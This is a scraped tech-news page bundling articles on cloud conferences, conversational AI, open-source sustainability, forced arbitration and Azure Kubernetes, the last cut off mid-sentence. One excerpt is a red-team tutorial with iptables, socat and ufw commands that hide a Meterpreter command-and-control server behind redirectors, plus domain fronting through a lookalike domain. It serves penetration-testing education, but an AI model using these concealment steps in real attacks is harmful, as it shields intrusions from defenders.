microservices, central orchestration processing, and related projects to further cloud-native education of technologies that support the cloud-native ecosystem. What’s happening at this year’s KubeCon? The conference will feature a range of events and sessions from industry experts, project leaders, as well as sponsors. The details of the conference still need development, but the focus will be on projects such as Kubernetes (obviously), Prometheus, Linkerd, and CoreDNS. Who’s it for? The conference is relevant to anyone with an interest in software infrastructure. It’s likely to be instructive and insightful for those working in SRE, DevOps and administration, but because of Kubernetes importance in cloud native practices, there will be something here for many others in the technology industry. . The cost is unconfirmed, but it can be anywhere between $150 and $1,100. #6 IEEE International Conference on Cloud Computing When and where is the IEEE International Conference on Cloud Computing? July 8-13 in Milan. What is it? This is an IEEE conference solely dedicated to Cloud computing. IEEE Cloud is basically for research practitioners to exchange their findings on the latest cloud computing advances. It includes findings across all “as a service” categories, including network, infrastructure, platform, software, and function. What’s happening at the IEEE International Conference on Cloud Computing? IEEE cloud 2019 invites original research papers addressing all aspects of cloud computing technology, systems, applications, and business innovations. These are mostly based on technical topics including cloud as a service, cloud applications, cloud infrastructure, cloud computing architectures, cloud management, and operations. Shangguang Wang and Stephan Reiff-Marganiec have been appointed as congress workshops chairs. Featured keynote speakers for the 2019 World Congress on Services include Kathryn Guarini, VP at IBM Industry Research and Joseph Sifakis, the Emeritus Senior CNRS Researcher at Verimag. Who’s it for? The conference has a more academic bent than the others on this list. That means it’s particularly important for researchers in the field, but there will undoubtedly be lots here for industry practitioners that want to find new perspectives on the relationship between cloud computing and business. #7 VMworld When and where is VMWorld 2019? August 25 - 29 in San Francisco. What is it? VMworld is a virtualization and cloud computing conference, hosted by VMware. It is the largest virtualization-specific event. VMware CEO Pat Gelsinger and the executive team typically provide updates on the company’s various business strategies, including multi-cloud management, VMware Cloud for AWS, end-user productivity, security, mobile, and other efforts. What’s happening at VMworld 2019? The 5-day conference starts with general sessions on IT and business. It then goes deeper into breakout sessions, expert panels, and quick talks. It also holds various VMware Hands-on Labs and VMware Certification opportunities as well as one-on-one appointments with in-house experts. The expected attendee is over 21000+. Who’s it for? VMworld maybe doesn’t have the glitz and glamor of an event like DockerCon or KubeCon, but for administrators and technological decision makers that have an interest in VMware’s products and services. #8 Microsoft Ignite When and where is Microsoft Ignite 2019? November 4-8 at Orlando, Florida What is it? Ignite is Microsoft's flagship enterprise event for everything cloud, data, business intelligence, teamwork, and productivity. What’s happening at Microsoft Ignite 2019? Microsoft Ignite 2019 is expected to feature almost 700 + deep-dive sessions and 100 + expert-led and self-paced workshops. The full agenda will be posted sometime in Spring 2019. You can pre-register for Ignite 2019 here. Microsoft will also be touring many cities around the world to bring the Ignite experience to more people. Who’s it for? The event should have wide appeal, and will likely reflect Microsoft’s efforts to bring a range of tech professionals into the ecosystem. Whether you’re a developer, infrastructure engineer, or operations manager, Ignite is, at the very least, an event you should pay attention to. #9 Dreamforce When and where is Dreamforce 2019? November 19-22, in San Francisco. What is it? Dreamforce, hosted by Salesforce, is a truly huge conference, attended by more than 100,000 people.. Focusing on Salesforce and CRM, the event is an opportunity to learn from experts, share experiences and ideas, and to stay up to speed with the trends in the field, like automation and artificial intelligence. What’s happening at Dreamforce 2019? Dreamforce covers over 25 keynotes, a vast range of breakout sessions (almost 2700) and plenty of opportunities for networking. The conference is so extensive that it has its own app to help delegates manage their agenda and navigate venues. Who’s it for? Dreamforce is primarily about Salesforce - for that reason, it’s very much an event for customers and users. But given the size of the event, it also offers a great deal of insight on how businesses are using SaaS products and what they expect from them. This means there is plenty for those working in more technical or product roles to learn at the event.. #10 Amazon re:invent When and where is Amazon re:invent 2019? December 2-6 at The Venetian, Las Vegas, USA What is it? Amazon re:invent is hosted by AWS. If you’ve been living on mars in recent years, AWS is the market leader when it comes to cloud. The event, then, is AWS’ opportunity to set the agenda for the cloud landscape, announcing updates and new features, as well as an opportunity to discuss the future of the platform. What’s happening at Amazon re:invent 2019? Around 40,000 people typically attend Amazon’s top cloud event.  Amazon Web Services and its cloud-focused partners typically reveal product releases on several fronts. Some of these include enterprise security, Transit Virtual Private Cloud service, and general releases. This year, Amazon is also launching a related conference dedicated exclusively to cloud security called re:Inforce. The inaugural event will take place in Boston on June 25th and 26th, 2019 at the Boston Convention and Exhibition Center. Who’s it for? The conference attracts Amazon’s top customers, software distribution partners (ISVs) and public cloud MSPs. The event is essential for developers and engineers, administrators, architects, and decision makers. Given the importance of AWS in the broader technology ecosystem, this is an event that will be well worth tracking, wherever you are in the world. Did we miss an important cloud computing conference? Are you attending any of these this year? Let us know in the comments – we’d love to hear from you. Also, check this space for more detailed coverage of the conferences. Cloud computing trends in 2019 Key trends in software development in 2019: cloud native and the shrinking stack Key trends in software infrastructure in 2019: observability, chaos, and cloud complexity
Read more
  • 0
  • 0
  • 11197

article-image-conversational-ai-in-2018-an-arms-race-of-new-products-acquisitions-and-more
Bhagyashree R
21 Jan 2019
5 min read
Save for later

Conversational AI in 2018: An arms race of new products, acquisitions, and more

Bhagyashree R
21 Jan 2019
5 min read
Conversational AI is one of the most interesting applications of artificial intelligence in recent years. While the trend isn’t yet ubiquitous in the way that recommendation systems are (perhaps unsurprising), it has been successfully productized by a number of tech giants, in the form of Google Home and Amazon Echo (which is ‘powered by’ Alexa). The conversational AI arms race Arguably, 2018 has seen a bit of an arms race in conversational AI. As well as Google and Amazon, the likes of IBM, Microsoft, and Apple have wanted a piece of the action. Here are some of the new conversational AI tools and products these companies introduced this year: Google Google worked towards enhancing its conversational interface development platform, Dialogflow. In July, at the Google Cloud Next event, it announced several improvements and new capabilities to Dialogflow including Text to Speech via DeepMind's WaveNet and Dialogflow Phone Gateway for telephony integration. It also launched a new product called Contact Center AI that comes with Dialogflow Enterprise Edition and additional capabilities to assist live agents and perform analytics. Google Assistant became better in having a back-and-forth conversation with the help of Continued Conversation, which was unveiled at the Google I/O conference. The assistant became multilingual in August, which means users can speak to it in more than one language at a time, without having to adjust their language settings. Users can enable this multilingual functionality by selecting two of the supported languages. Following the footsteps of Amazon, Google also launched its own smart display named Google Home Hub at the ‘Made by Google’ event held in October. Microsoft Microsoft in 2018 introduced and improved various bot-building tools for developers. In May, at the Build conference, Microsoft announced major updates in their conversational AI tools: Azure Bot Service, Microsoft Cognitive Services Language Understanding, and QnAMaker. To enable intelligent bots to learn from example interactions and handle common small talk, it launched new experimental projects from named Conversation Learner and Personality Chat. At Microsoft Ignite, Bot Framework SDK V4.0 was made generally available. Later in November, Microsoft announced the general availability of the Bot Framework Emulator V4 and Web Chat control. In May, to drive more research and development in its conversational AI products, Microsoft acquired Semantic Machines and established conversational AI center of excellence in Berkeley. In November, the organization's acquisition of Austin-based bot startup XOXCO was a clear indication that it wants to get serious about using artificial intelligence for conversational bots. Producing guidelines on developing ‘responsible’ conversational AI further confirmed Microsoft wants to play a big part in the future evolution of the area. Microsoft were the chosen tech partner by UK based conversational AI startup ICS.ai. The team at ICS are using Azure and LUIS from Microsoft in their public sector AI chatbots, aimed at higher education, healthcare trusts and county councils. Amazon Amazon with the aims to improve Alexa’s capabilities released Alexa Skills Kit (ASK) which consists of APIs, tools, documentation, and code samples using which developers can build new skills for Alexa. In September, it announced a preview of a new design language named Alexa Presentation Language (APL). With APL, developers can build visual skills that include graphics, images, slideshows, and video, and to customize them for different device types. Amazon’s smart speaker Echo Dot saw amazing success with becoming the best seller in smart speaker category on Amazon. At its 2018 hardware event in Seattle, Amazon announced the launch of redesigned Echo Dot and a new addition to Alexa-powered A/V device called Echo Plus. As well as the continuing success of Alexa and the Amazon Echo, Amazon’s decision to launch the Alexa Fellowship at a number of leading academic institutions also highlights that for the biggest companies conversational AI is as much about research and exploration as it is products. Like Microsoft, it appears that Amazon is well aware that conversational AI is an area only in its infancy, still in development - as much as great products, it requires clear thinking and cutting-edge insight to ensure that it develops in a way that is both safe and impactful. What’s next? This huge array of products is a result of advances in deep learning researches. Now conversational AI is not just limited to small tasks like setting an alarm or searching the best restaurant. We can have a back and forth conversation with the conversational agent. But, needless to say, it still needs more work. Conversational agents are yet to meet user expectations related to sensing and responding with emotion. In the coming years, we will see these systems understand and do a good job at generating natural language. They will be able to have reasonably natural conversations with humans in certain domains, grounded in context. Also, the continuous development in IoT will provide AI systems with more context. Apple has introduced Shortcuts for iOS 12 to automate your everyday tasks Microsoft amplifies focus on conversational AI: Acquires XOXCO; shares guide to developing responsible bots Amazon is supporting research into conversational AI with Alexa fellowships
Read more
  • 0
  • 0
  • 3441
article-image-github-wants-to-improve-open-source-sustainability-invites-maintainers-to-talk-about-their-oss-challenges
Sugandha Lahoti
18 Jan 2019
4 min read
Save for later

Github wants to improve Open Source sustainability; invites maintainers to talk about their OSS challenges

Sugandha Lahoti
18 Jan 2019
4 min read
Open Source Sustainability is an essential and special part of free and open software development. Open source contributors and maintainers build tools and technologies for everyone, but they’ don’t get enough resources, tools, and environment. If anything goes wrong with the project, it is generally the system contributors who are responsible for it. In reality, however, contributors, and maintainers together are equally responsible. Yesterday, Devon Zuegel, the open source product manager at GitHub penned a blog post talking about open source sustainability and what are the issues current open source maintainers face while trying to contribute to open source. The major thing holding back OSS is the work overload that maintainers face. The OS community generally consists of maintainers who are working at some other organization while also maintaining the open source projects mostly in their free time. This leaves little room for software creators to have economic gain from their projects and compensate for costs and people required to maintain their projects. This calls for companies and individuals to donate to these maintainers on GitHub. As a hacker news user points out, “ I think this would be a huge incentive for people to continue their work long-term and not just "hand over" repositories to people with ulterior motives.” Another said, “Integrating bug bounties and donations into GitHub could be one of the best things to happen to Open Source. Funding new features and bug fixes could become seamless, and it would sway more devs to adopt this model for their projects.” Another major challenge is the abuse and frustration that maintainers have to go on a daily basis. As Devon writes on her blog, “No one deserves abuse. OSS contributors are often on the receiving end of harassment, demands, and general disrespect, even as they volunteer their time to the community.”  What is required is to educate people and also build some kind of moderation for trolls like a small barrier to entry. Apart from that maintainers should also be given expanded visibility into how their software is used. Currently, they are only given access to download statistics. There should be a proper governance model that should be regularly updated based on the what decisions team makes, delegates, and communicates. As Adam Jacob founder of SFOSC (Sustainable Free and Open Source Communities) points out, “I believe we need to start talking about Open Source, not in terms of licensing models, or business models (though those things matter): instead, we should be talking about whether or not we are building sustainable communities. What brings us together, as people, in this common effort around the software? What rights do we hold true for each other? What rights are we willing to trade in order to see more of the software in the world, through the investment of capital?” SFOSC is established to discuss the principles that lead to sustainable communities, to develop clear social contracts communities can use, and educate Open Source companies on which business models can create true communities. As with SFOSC, Github also wants to better understand the woes of maintainers from their own experiences and hence the blog. Devon wants to support the people behind OSS at Github inviting people to have an open dialogue with the GitHub community solving nuanced and unique challenges that the current OSS community face. She has created a contact form asking open source contributors or maintainer to join the conversation and share their problems. Open Source Software: Are maintainers the only ones responsible for software sustainability? We need to encourage the meta-conversation around open source, says Nadia Eghbal [Interview] EU to sponsor bug bounty programs for 14 open source projects from January 2019
Read more
  • 0
  • 0
  • 2631

article-image-googlers-launch-industry-wide-awareness-campaign-to-fight-against-forced-arbitration
Natasha Mathur
17 Jan 2019
6 min read
Save for later

Googlers launch industry-wide awareness campaign to fight against forced arbitration

Natasha Mathur
17 Jan 2019
6 min read
A group of Googlers launched a public awareness social media campaign from 9 AM to 6 PM EST yesterday. The group, called, ‘Googlers for ending forced arbitration’ shared information about arbitration on their Twitter and Instagram accounts throughout the day. https://twitter.com/endforcedarb/status/1084813222505410560 The group tweeted out yesterday, as part of the campaign, that in surveying employees of 30+ tech companies and 10+ common Temp/Contractor suppliers in the industry, none of them could meet the three primary criteria needed for a transparent workplace. The three basic criteria include: optional arbitration policy for all employees and for all forms of discrimination (including contractors/temps), no class action waivers, and no gag rule that keeps arbitration hearings proceedings confidential. The group shared some hard facts about Arbitration and also busted myths regarding the same. Let’s have a look at some of the key highlights from yesterday’s campaign. At least 60 million Americans are forced to use arbitration The group states that the implementation of forced arbitration policy has grown significantly in the past seven years. Over 65% of the companies consisting of 1,000 or more employees, now have mandatory arbitration procedures. Employees don’t have an option to take their employers to court in cases of harassment or discrimination. People of colour and women are often the ones who get affected the most by this practice.           How employers use forced Arbitration Forced arbitration is extremely unfair Arbitration firms that are hired by the companies usually always favour the companies over its employees. This is due to the fear of being rejected the next time by an employer lest the arbitration firm decides to favour the employee. The group states that employees are 1.7 times more likely to win in Federal courts and 2.6 times more likely to win in state courts than in arbitration.   There are no public filings of the complaint details, meaning that the company won’t have anyone to answer to regarding the issues within the organization. The company can also limit its obligation when it comes to disclosing the evidence that you need to prove your case.   Arbitration hearings happen behind closed doors within a company When it comes to arbitration hearings, it's just an employee and their lawyer, other party and their lawyer, along with a panel of one to three arbitrators. Each party gets to pick one arbitrator each, who is also hired by your employers. However, there’s usually only a single arbitrator panel involved as three-arbitrator panel costs five times more than a single arbitrator panel, as per the American Arbitration Association. Forced Arbitration requires employees to sign away their right to class action lawsuits at the start of the employment itself The group states that irrespective of having legal disputes or not, forced arbitration bans employees from coming together as a group in case of arbitration as well as in case of class action lawsuits. Most employers also practice “gag rule” which restricts the employee to even talk about their experience with the arbitration policy. There are certain companies that do give you an option to opt out of forced arbitration using an opt-out form but comes with a time constraint depending on your agreement with that company. For instance, companies such as Twitter, Facebook, and Adecco give their employees a chance to opt out of forced arbitration.                                                  Arbitration opt-out option JAMS and AAA are among the top arbitration organizations used by major tech giants JAMS, Judicial Arbitration and Mediation Services, is a private company that is used by employers like Google, Airbnb, Uber, Tesla, and VMware. JAMS does not publicly disclose the diversity of its arbitrators. Similarly, AAA, America Arbitration Association, is a non-profit organization where usually retired judges or lawyers serve as arbitrators. Arbitrators in AAA have an overall composition of 24% women and minorities. AAA is one of the largest arbitration organizations used by companies such as Facebook, Lyft, Oracle, Samsung, and Two Sigma.   Katherine Stone, a professor from UCLA law school, states that the procedure followed by these arbitration firms don’t allow much discovery. What this means is that these firms don’t usually permit depositions or various kinds of document exchange before the hearing. “So, the worker goes into the hearing...armed with nothing, other than their own individual grievances, their own individual complaints, and their own individual experience. They can’t learn about the experience of others,” says Stone. Female workers and African-American workers are most likely to suffer from forced arbitration 58% female workers and 59% African American workers face mandatory arbitration depending on the workgroups. For instance, in the construction industry, which is a highly male-dominated industry, the imposition of forced arbitration is at the lowest rate. But, in the education and health industries, which has the majority of the female workforce, the imposition rate of forced arbitration is high.                                 Forced Arbitration rate among different workgroups Supreme Court has gradually allowed companies to expand arbitration to employees & consumers The group states that the 1925 Federal Arbitration Act (FAA) had legalized arbitration between shipping companies in cases of settling commercial disputes. The supreme court, however, expanded this practice of arbitration to companies too.                                                   Supreme court decisions Apart from sharing these facts, the group also shed insight on dos and don’t that employees should follow under forced arbitration clauses.                                                      Dos and Dont’s The social media campaign by Googlers for forced arbitration represents an upsurge in the strength and courage among the employees within the tech industry as not just the Google employees but also employees from different tech companies shared their experience regarding forced arbitration. The group had researched academic institutions, labour attorneys, advocacy groups, etc, and the contracts of around 30 major tech companies, as a part of the campaign. To follow all the highlights from the campaign, follow the End Forced Arbitration Twitter account. Shareholders sue Alphabet’s board members for protecting senior execs accused of sexual harassment Recode Decode #GoogleWalkout interview shows why data and evidence don’t always lead to right decisions in even the world’s most data-driven company Tech Workers Coalition volunteers talk unionization and solidarity in Silicon Valley
Read more
  • 0
  • 0
  • 2413

article-image-obfuscating-command-and-control-c2-servers-securely-with-redirectors-tutorial
Amrata Joshi
16 Jan 2019
11 min read
Save for later

Obfuscating Command and Control (C2) servers securely with Redirectors [Tutorial]

Amrata Joshi
16 Jan 2019
11 min read
A redirector server is responsible for redirecting all the communication to the C2 server. Let's explore the basics of redirector using a simple example. Take a scenario in which we have already configured our team server and we're waiting for an incoming Meterpreter connection on port 8080/tcp. Here, the payload is delivered to the target and has been executed successfully. This article is an excerpt taken from the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. This book covers advanced methods of post-exploitation using Cobalt Strike and introduces you to Command and Control (C2) servers and redirectors. In this article, you will understand the basics of redirectors, the process of obfuscating C2 securely, domain fronting and much more. To follow are the things that will happen next: On payload execution, the target server will try to connect to our C2 on port 8080/tcp. Upon successful connection, our C2 will send the second stage as follows: A Meterpreter session will then open and we can access this using Armitage: However, the target server's connection table will have our C2s IP in it. This means that the monitoring team can easily get our C2 IP and block it: Here's the current situation. This is displayed in an architectural format in order to aid understanding: To protect our C2 from being burned, we need to add a redirector in front of our C2. Refer to the following image for a clear understanding of this process: This is currently the IP information of our redirector and C2: Redirector IP: 35.153.183.204 C2 IP: 54.166.109.171 Assuming that socat is installed on the redirector server, we will execute the following command to forward all the communications on the incoming port 8080/tcp to our C2: Our redirector is now ready. Now let's generate a one-liner payload with a small change. This time, the lhost will be set to the redirector IP instead of the C2: Upon execution of the payload, the connection will initiate from the target server and the server will try to connect with the redirector: We might now notice something different about the following image as the source IP is redirector instead of the target server: Let's take a look at the connection table of the target server: The connection table doesn't have our C2 IP and neither does the Blue team. Now the redirector is working perfectly, what could be the issue with this C2-redirector setup? Let's perform a port scan on the C2 to check the available open ports: As we can see from the preceding screenshot, port 8080/tcp is open on our C2. This means that anyone can try to connect to our listener in order to confirm its existence. To avoid situations like this, we should configure our C2 in such a way that allows us to protect it from outside reconnaissance (recon) and attacks. Obfuscating C2 securely To put it in a diagrammatic format, our current C2 configuration is this: If someone tries to connect to our C2 server, they will be able to detect that our C2 server is running a Meterpreter handler on port 8080/tcp: To protect our C2 server from outside scanning and recon, let's set the following Uncomplicated Firewall (UFW) ruleset so that only our redirector can connect to our C2. To begin, execute the following UFW commands to add firewall rules for C2: sudo ufw allow 22 sudo ufw allow 55553 sudo ufw allow from 35.153.183.204 to any port 8080 proto tcp sudo ufw allow out to 35.153.183.204 port 8080 proto tcp sudo ufw deny out to any The given commands needs to be executed and the result is shown in the following screenshot: In addition, execute the following ufw commands to add firewall rules for redirector as well: sudo ufw allow 22 sudo ufw allow 8080 The given commands needs to be executed and the result is shown in the following screenshot: Once the ruleset is in place, this can be described as follows: If we try to perform a port scan on the C2 now, the ports will be shown as filtered: as shown below. Furthermore, our C2 is only accessible from our redirector now. Let's also confirm this by doing a port scan on our C2 from redirector server: Short-term and long-term redirectors Short-term (ST)—also called short haul—C2 are those C2 servers on which the beaconing process will continue. Whenever a system in the targeted organization executes our payload, the server will connect with the ST-C2 server. The payload will periodically poll for tasks from our C2 server, meaning that the target will call back to the ST-C2 server every few seconds. The redirector placed in front of our ST-C2 server is called the short-term (ST) redirector. This is responsible for handling ST-C2 server connections on which the ST-C2 will be used for executing commands on the target server in real time. ST and LT redirectors would get caught easily during the course of engagement because they're placed at the front. Long-term (LT)—also known as long-haul—C2 server is where the callbacks received from the target server will be after every few hours or days. The redirector placed in front of our LT-C2 server is called a long-term (LT) redirector. This redirector is used to maintain access for a longer period of time than ST redirectors. When performing persistence via the ST-C2 server, we need to provide the domain of our LT redirector so that the persistence module running on the target server will connect back to the LT redirector instead of the ST redirector. A segregated red team infrastructure setup would look something like this: Source: https://payatu.com/wp-content/uploads/2018/08/redteam_infra.png Once we have a proper red team infrastructure setup, we can focus on the kind of redirection we want to have in our ST and LT redirectors. Redirection methods There are two ways in which we can perform redirection: Dumb pipe redirection Filtration/smart redirection Dumb pipe redirection The dumb pipe redirectors blindly forward the network traffic from the target server to our C2, or vice-versa. This type of redirector is useful for quick configuration and setup, but they lack a level of control over the incoming traffic. Dumb pipe redirection will obfuscate (hide) the real IP of our C2, but won't it distract the defenders of the organization from investigating our setup. We can perform dumb pipe redirection using socat or iptables. In both cases, the network traffic will be redirected either to our ST-C2 server or LT-C2 server. Source: https://payatu.com/wp-content/uploads/2018/08/dumb_pipe_redirection123.png Let's execute the command given in the following image in order to configure a dumb pipe redirector which would redirect to our C2 on port 8080/tcp: Following are the commands that we can execute to perform dumb pipe redirection using iptables: iptables -I INPUT -p tcp -m tcp --dport 8080 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 54.166.109.171:8080 iptables -t nat -A POSTROUTING -j MASQUERADE iptables -I FORWARD -j ACCEPT iptables -P FORWARD ACCEPT sysctl net.ipv4.ip_forward=1 The given commands needs to be executed and the result is shown in the following screenshot: (Ignore the sudo error here. This has occurred because of the hostname that we changed) Using socat or iptables, the result would be same i.e. the network traffic on the redirector's interface will be forwarded to our C2. Filtration/smart redirection Filtration redirection, also known as smart redirection, doesn't just blindly forward the network traffic to the C2. Smart redirection will always process the network traffic based on the rules defined by the red team before forwarding it to the C2. In a smart redirection, if the C2 traffic is invalid, the network traffic will either be forwarded to a legitimate website or it would just drop the packets. Only if the network traffic is for our C2 will the redirection work accordingly: To configure a smart redirection, we need to install a web service and configure it. Let's install Apache server on the redirector using the sudo apt install apache2 command: We need to execute the following commands as well in order to enable Apache modules to be rewritten, and also to enable SSL: sudo apt-get install apache2 sudo a2enmod ssl rewrite proxy proxy_http sudo a2ensite default-ssl.conf sudo service apache2 restart These are all commands that needs to be executed. The result of the executed commands are shown in the following screenshot: We also need to configure the Apache from its configuration: We need to look for the Directory directive in order to change the AllowOverride from None to All so that we can use our custom .htaccess file for web request filtration. We can now set up the virtual host setting and add this to wwwpacktpub.tk (/etc/apache2/sites-enabled/default-ssl.conf): After this, we can generate the payload with a domain such as wwwpacktpub.tk in order to get a connection. Domain fronting According to https://resources.infosecinstitute.com/domain-fronting/: Domain fronting is a technique that is designed to circumvent the censorship employed for certain domains (censorship may occur for domains that are not in line with a company's policies, or they may be a result of the bad reputation of a domain). Domain fronting works at the HTTPS layer and uses different domain names at different layers of the request (more on this later). To the censors, it looks like the communication is happening between the client and a permitted domain. However, in reality, communication might be happening between the client and a blocked domain. To make a start with domain fronting, we need to get a domain that is similar to our target organization. To check for domains, we can use the domainhunter tool. Let's clone the repository to continue: We need to install some required Python packages before continuing further. This can be achieved by executing the pip install -r requirements.txt command as follows: After installation, we can run the tool by executing the python domainhunter.py command as follows: By default, this will fetch for the expired and deleted domains that have a blank name because we didn't provide one: Let's check for the help option to see how we can use domainhunter: Let's search for a keyword to look for the domains related to the specified keyword. In this case, we will use packtpub as the desired keyword: We just found out that wwwpacktpub.com is available. Let's confirm its availability at domain searching websites as follows: This confirms that the domain is available on name.com and even on dot.tk for almost $8.50: Let's see if we can find a free domain with a different TLD: We have found that the preceding-mentioned domains are free to register. Let's select wwwpacktpub.tk as follows: We can again check the availability of www.packtpub.tk and obtain this domain for free: In the preceding setting, we need to set our redirector's IP address in the Use DNS field: Let's review the purchase and then check out: Our order has now been confirmed. We just obtained wwwpacktpub.tk: Let's execute the dig command to confirm our ownership of this: The dig command resolves wwwpacktpub.tk to our redirector's IP. Now that we have obtained this, we can set the domain in the stager creation and get the back connection from wwwpacktpub.tk: In this article, we have learned the basics of redirectors and we have also covered how we can obfuscate C2s in a secure manner so that we can protect our C2s from getting detected by the Blue team.  This article also covered short-term and long-term C2s and much more. To know more about advanced penetration testing tools and more check out the book Hands-On Red Team Tactics written by Himanshu Sharma and Harpreet Singh. Introducing numpywren, a system for linear algebra built on a serverless architecture Fortnite server suffered a minor outage, Epic Games was quick to address the issue Windows Server 2019 comes with security, storage and other changes
Read more
  • 0
  • 0
  • 12499
article-image-implementing-azure-managed-kubernetes-and-azure-container-service-tutorial
Melisha Dsouza
15 Jan 2019
12 min read
Save for later

Implementing Azure-Managed Kubernetes and Azure Container Service [Tutorial]

Melisha Dsouza
15 Jan 2019
12 min read
The next level of virtualization is containers as they provide a better solution than virtual machines within Hyper-V, as containers optimize resources by sharing as much as possible of the existing container platform. Azure Kubernetes Service (AKS) simplifies the deployment and operations of Kubernetes and enables users to dynamically scale their application infrastructure with agility; along with simplifying cluster maintenance with automated upgrades and scaling. Azure Container Service (ACS) simplifies the management of Docker clusters for running containerized applications This tutorial will combine the above-defined concepts and describe how to design and implement containers, and how to choose the proper solution for orchestrating containers. You will get an overview of how Azure can help you to implement services based on containers and get rid of traditional virtualization stuff with redundant OS resources that need to be managed, updated, backed-up, and optimized. To run containers in a cloud environment, no specific installations are required, as you only need the following: A computer with an internet browser An Azure subscription (if not available, a trial could work too). With Azure, you will have the option to order a container directly in Azure as an Azure Container Instance (ACI) or a managed Azure solution using Kubernetes as orchestrator. This tutorial is an excerpt from a book written by Florian Klaffenbach et al. titled  Implementing Azure Solutions - Second Edition. This book will get you up and running with Azure services and teach you how to implement them in your organization. All of the code for this tutorial can be found at GitHub. Azure Container Registry (ACR) If you need to set up a container environment to be used by the developers in your Azure tenant, you will have to think about where to store your container images. In general, the way to do this is to provide a container registry. This registry could reside on a VM itself, but using PaaS services with cloud technologies always provides an easier and more flexible design. This is where Azure Container Service (ACS) comes in, as it is a PaaS solution that provides high flexibility and even features such as replication between geographies. This means you will need to fill in the following details: When you create your container registry, you will need to define the following: The registry name (ending with azurecr.io) The resource group the registry sits in The Azure location The admin user (if you will need to log in to the registry using an account) The SKU: Basic Standard Premium The following table details the features and limits of the basic, standard, and premium service tiers: Resource Basic Standard Premium Storage 10 GiB 100 GiB 500 GiB Max image layer size 20 GiB 20 GiB 50 GiB ReadOps per minute 1,000 3,000 10,000 WriteOps per minute 100 500 2,000 Download bandwidth MBps 30 60 100 Upload bandwidth MBps 10 20 50 Webhooks 2 10 100 Geo-replication N/A N/A Supported  Switching between the different SKUs is supported and can be done using the portal, PowerShell, or CLI. If you still are on a classic ACR, the first step would be to upgrade to a managed registry. Azure Container Instances By running your workloads in ACI, you don't have to set up a management infrastructure for your containers, you just can put your focus on design and building the applications. Creating your first container in Azure Let's create a first simple container in Azure using the portal:  Go to Container Instances under New | Marketplace | Everything, as shown in the following screenshot: After having chosen the Container Instances entry in the resources list, you will have to define some properties like: We will need to define the Azure container name. Of course, this needs to be unique in your environment. Then, we will need to define the source of the image and to which resource group and region it should be deployed within Azure. As already mentioned, containers can reside on Windows and Linux, because this needs to be defined at first. Afterwards, we will need to define the resources per container: Cores Memory Ports Port protocol Restart policy (if the container went offline) After having deployed the corresponding container registry, we can start working with the container instance: When hitting the URL posted in the left part, under FQDN, you should see the following screenshot: After we have finalized the preceding steps, we have an ACI up and running, which means that you are able to provide container images, load them up to Azure, and run them. Azure Marketplace containers In the public Azure Marketplace, you can find existing container images that just can be deployed to your subscription. These are pre-packaged images that give you the option to start with your first container in Azure. As cloud services provide reusability and standardization, this entry point is always good to look at first. Before starting with this, we will need to check if the required resource providers are enabled on the subscription you are working with. Otherwise, we will need to register them by hitting the Register entry and waiting a few minutes for completion, as shown in the following screenshot: Now, we can start deploying marketplace containers such as the container image for WordPress, which is used as a sample, as shown in the following screenshot: At first, we will need to decide on the corresponding image and choose to create a new ACR, or use an existing one. Furthermore, the Azure region, the resource group, and the tag (for example, version) need to be defined in the following dialog: Now that the registry is being created, we will need to update the permission settings, also called enable admin registry. This can be done with the Admin user Enable button as shown in the following screenshot:  Regarding the SKU, this is just another point where we can set the priority and define performance. This may take some minutes to be enabled. Now, we can start deploying container images from the container registry, as you can see in the following screenshot with the WordPress image that is already available in the registry: At first, we will need to choose the corresponding container from the registry; right-click the tag version from the Tags section: Having done that, we will need to hit the Deploy to web app menu entry to deploy the web app to Azure: As the properties that need to be filled are some defaults for Web Apps, it is quite easy to set them: Finally, the first containerized image for a web app has been deployed to Azure. Container orchestration One of the most interesting topics with regard to containers is that they provide technology for scaling. For example, if we need more performance on a website that is running containerized, we would just spin off an additional container to load-balance the traffic. This could even be done if we needed to scale down. The concept of container orchestration Regarding this technology, we need an orchestration tool to provide this feature set. There are some well-known container orchestration tools available on the market, such as the following: Docker swarm DC/OS Kubernetes Kubernetes is the most-used one, and therefore could be deployed as a service in most public cloud services, such as in Azure. It provides the following features: Automated container placement: On the container hosts, to best spread the load between them Self-healing: For failed containers, restarting them in a proper way Horizontal scaling: Automated horizontal scaling (up and down) based on the existing load Service discovery and load balancing: By providing IP-addresses to containers and managing DNS registrations Rollout and rollback: Automated rollout and rollback for containers, which provides another self-healing feature as updated containers that are newly rolled-out are just rolled back if something goes wrong Configuration management: By updating secrets and configurations without the need to fully rebuild the container itself Azure Kubernetes Service (AKS) Installing, maintaining, and administering a Kubernetes cluster manually could mean a huge investment of time for a company. In general, these tasks are one-off costs and therefore it would be best to not waste these resources. In Azure today, there is a feature called AKS, where K emphasizes that it is a managed Kubernetes service. For AKS, there is no charge for Kubernetes masters, you just have to pay for the nodes that are running the containers. Before you start, you will have to fulfill the following prerequisites: An Azure account with an active subscription Azure CLI installed and configured Kubernetes command-line tool, kubectl, installed Make sure that the Azure subscription you use has these required resources—storage, compute, networking, and a container service: For the first step, you need to choose Kubernetes service and choose to create your AKS deployment for your tenant. The following parameters need to be defined: Resource group for the deployment Kubernetes cluster name Azure region Kubernetes version DNS prefix Then,  hit the Authentication tab, as shown in the following screenshot: On the Authentication tab, you will need to define a service principal or choose and existing one, as AKS needs a service principal to run the deployment. In addition, you could enable the RBAC feature, which gives you the chance to define fine-grained permissions based on Azure AD accounts and groups. On the Networking tab, you can choose either to add the Kubernetes cluster into an existing VNET, or create a new one. In addition, the HTTP routing feature can be enabled or disabled: On the Monitoring tab, you have the option to enable container monitoring and link it to an existing Log Analytics workspace, or create a new one: The following is the source from which to set your required tags: Finally, the validation will check for any misconfigurations and create the Azure ARM template for the deployment. Clicking the Create button will start the deployment phase, which could run for several minutes or even longer depending on the chosen feature, and scale: After the deployment has finished, the Kubernetes dashboard is available. You can view the Kubernetes dashboard by clicking on the View Kubernetes dashboard link, as shown in the following screenshot: The dashboard looks something like the one shown in the following screenshot: As you can see in the preceding screenshot, there are four steps to open the dashboard. At first, we will need to install the Azure CLI in its most current version using the statement that is mentioned in the following screenshot: Afterward, the AKS CLI needs to be enabled. It is called kubectl.exe. Finally, after setting all the parameters (and when you have performed steps 3 and 4 from the preceding task list), the following dashboard should open in a new browser window: The preceding dashboard provides a way to monitor and administer your Azure Kubernetes environment, in general, from a GUI. If a new Kubernetes version becomes available, you can easily update it from the Azure portal yourself with one click, as shown in the following screenshot: If you need to 